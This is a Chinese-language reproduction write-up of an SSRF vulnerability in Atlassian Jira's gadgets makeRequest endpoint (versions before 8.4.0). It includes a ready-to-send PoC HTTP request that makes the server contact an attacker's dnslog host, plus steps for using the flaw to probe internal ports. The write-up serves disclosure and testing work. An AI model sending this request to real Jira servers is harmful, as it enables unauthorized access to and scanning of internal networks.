一、簡介
JIRA是Atlassian公司出品的項目與事務跟蹤工具,被廣泛應用于缺陷跟蹤、客戶服務、需求收集、流程審批、任務跟蹤、項目跟蹤和靈活管理等工作領域。
二、漏洞描述
Jira的/plugins/servlet/gadgets/makeRequest資源存在SSRF漏洞,原因在于JiraWhitelist這個類的邏輯缺陷,成功利用此漏洞的遠端攻擊者可以以Jira服務端的身份通路内網資源。經分析,此漏洞無需任何憑據即可觸發。
三、漏洞影響版本
Jira < 8.4.0
此漏洞是在Jira伺服器7.6.0版中引入的,并在7.13.9和8.4.0版中進行了修複
四、漏洞複現
poc:
GET /plugins/servlet/gadgets/makeRequest?url=http://xx.xx.xx.xx:[email protected] HTTP/1.1
Host: xx.xx.xx.xx:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://xx.xx.xx.xx:8080/secure/Dashboard.jspa
X-Atlassian-Token: no-check
Content-Length: 0 1、通路url,burp抓包,将資料包替換為如上Poc,其中ip替換為目标ip,共三處,dnslog位址也需要換成自己的dnslog,發包發現成功執行
2、在dnslog平台檢視
3、如果通路未開放端口,結果如下,可以利用ssrf進行端口探測
------------------------------------------------------------------------------------------
參考:
https://www.cnblogs.com/backlion/p/11608371.html
https://zhuanlan.zhihu.com/p/113333332